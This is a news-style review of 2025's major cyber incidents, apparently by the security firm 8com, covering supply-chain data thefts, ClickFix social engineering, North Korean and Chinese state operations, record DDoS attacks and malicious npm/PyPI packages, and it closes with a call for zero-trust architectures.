2025 was a record-breaking year for cyber attacks. From Salesforce leaks to state espionage, 8com highlights the biggest threats and lessons learned in its comprehensive review of the year.

The year 2025 marks a turning point in the history of digital security. While experts often warned of an escalation in previous years, these warnings became reality last year. There was a permanent, highly automated and, at least in part, politically motivated threat situation. From massive extortion campaigns against global corporations to technologically innovative DDoS attacks, this year has shown that the defences of many organisations are hardly able to cope with the new strategies of attackers. Particularly striking was the increasing professionalisation of actors such as the ‘ShinyHunters’ group or the notorious ‘Clop’ gang, who have proven that it is often not the infrastructure of the companies themselves, but their partners and third-party providers that are the weakest link in the chain.

A prominent example of this strategy was the large-scale data theft from Salesforce customers. Salesforce itself was not compromised in this case. Instead, attackers gained access to sensitive data from numerous heavyweights such as Google, Cisco and Allianz Life via compromised OAuth tokens and third-party interfaces. At the same time, the ShinyHunters group made headlines by infiltrating the analytics service Mixpanel and gaining access to the data of over 200 million PornHub users. This case once again highlighted the enormous potential for blackmail when sensitive personal information is stolen, as its publication could have had fatal social consequences for many of those affected. Oracle E-Business Suite also came under attack when the Clop group exploited zero-day vulnerabilities to steal data from universities and global corporations – a digital raid that dragged on for months before culminating in countless blackmail emails in October 2025.

In addition to pure data theft, social engineering reached a new level of sophistication in 2025. So-called ‘ClickFix’ attacks spread rapidly, deceiving users with fake error messages or CAPTCHA queries that tricked them into manually copying malicious PowerShell commands into their systems. What began as a Windows threat quickly spread to macOS and Linux and was even commercialised through platforms such as ‘ErrTraffic’. Groups such as ‘Scattered Spider’ took an even more direct approach, targeting help desks and outsourcing partners. By skilfully manipulating support staff, they managed to bypass security controls and penetrate deep into the networks of companies such as Cognizant and Marks & Spencer. These incidents resulted in millions of pounds of damage and highlighted that humans remain one of the most critical vulnerabilities.

Another dark chapter of 2025 was state-sponsored cybercrime. North Korea in particular cemented its reputation as a digital aggressor. The Lazarus Group was responsible for one of the largest crypto heists in history when it stole around $1.5 billion in Ethereum from the cold wallets of the ByBit exchange. At the same time, a disturbing infiltration of Western companies by North Korean IT employees was uncovered. They used fake identities and so-called ‘laptop farms’ to get hired by US companies unnoticed and thus generate funds for the regime or engage in espionage. The ‘Salt Typhoon’ campaign played in a similar league of state espionage. Over a period of months, Chinese actors infiltrated the infrastructure of global telecommunications providers to monitor communications and steal configuration data, posing a massive threat to the national security of numerous Western countries.

Technically speaking, 2025 set new standards with record-breaking DDoS attacks. The Aisuru botnet demonstrated its enormous power with attacks that peaked at nearly 30 terabits per second, posing extreme challenges even for cloud giants such as Azure and Cloudflare. The software supply chain also remained a popular target: hundreds of thousands of malicious packages were injected into platforms such as npm and PyPI to capture developer secrets and API keys.

In summary, 2025 was the year in which the boundaries between crime, espionage and political sabotage finally became blurred. For the coming year, companies are left with the bitter realisation that ‘business as usual’ in IT security is no longer sufficient and that only a radical shift to zero-trust architectures and strict control of supply chains can offer long-term protection.